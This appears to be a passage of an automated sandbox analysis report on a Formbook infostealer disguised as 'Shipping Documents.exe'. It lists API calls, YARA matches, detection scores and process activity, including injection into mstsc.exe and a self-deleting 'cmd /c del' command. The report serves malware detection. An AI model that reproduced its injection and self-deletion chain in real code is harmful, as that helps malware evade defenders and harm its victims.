          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9560 NtWriteFile,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048296D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048298A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048298F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048299D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048295F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048297A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489E10 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489E90 NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489D5A NtCreateFile,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00406925
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041E853
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041D07C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041E00E
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041EA8B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00409E40
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00409E3C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B820A8
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB090
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71002
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABF900
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B822AE
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEEBB0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7DBD2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B82B28
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC841F
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2581
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACD5E0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B825DD
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB0D20
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B82D07
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B81D55
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B82EF7
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD6E30
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B81FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B20A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E0D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EF900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B2D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B1D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B22AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B2EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04806E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481EBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B1FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B2B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048D07C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048E00E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00472D87
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00472D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00479E40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00479E3C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00472FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 047EB150 appears 35 times
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: String function: 00ABB150 appears 35 times
          Source: 202139769574 Shipping Documents.exe, 00000001.00000003.646094416.000000000334F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 202139769574 Shipping Documents.exe
          Source: 202139769574 Shipping Documents.exe, 00000002.00000002.701116428.0000000000BAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 202139769574 Shipping Documents.exe
          Source: 202139769574 Shipping Documents.exe, 00000002.00000002.702183379.0000000002823000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs 202139769574 Shipping Documents.exe
          Source: 202139769574 Shipping Documents.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_01
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile created: C:\Users\user\AppData\Local\Temp\nseCE56.tmpJump to behavior
          Source: 202139769574 Shipping Documents.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 202139769574 Shipping Documents.exeVirustotal: Detection: 33%
          Source: 202139769574 Shipping Documents.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile read: C:\Users\user\Desktop\202139769574 Shipping Documents.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: 202139769574 Shipping Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 202139769574 Shipping Documents.exe, 00000001.00000003.646868549.0000000003230000.00000004.00000001.sdmp, 202139769574 Shipping Documents.exe, 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, mstsc.exe, 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 202139769574 Shipping Documents.exe, mstsc.exe
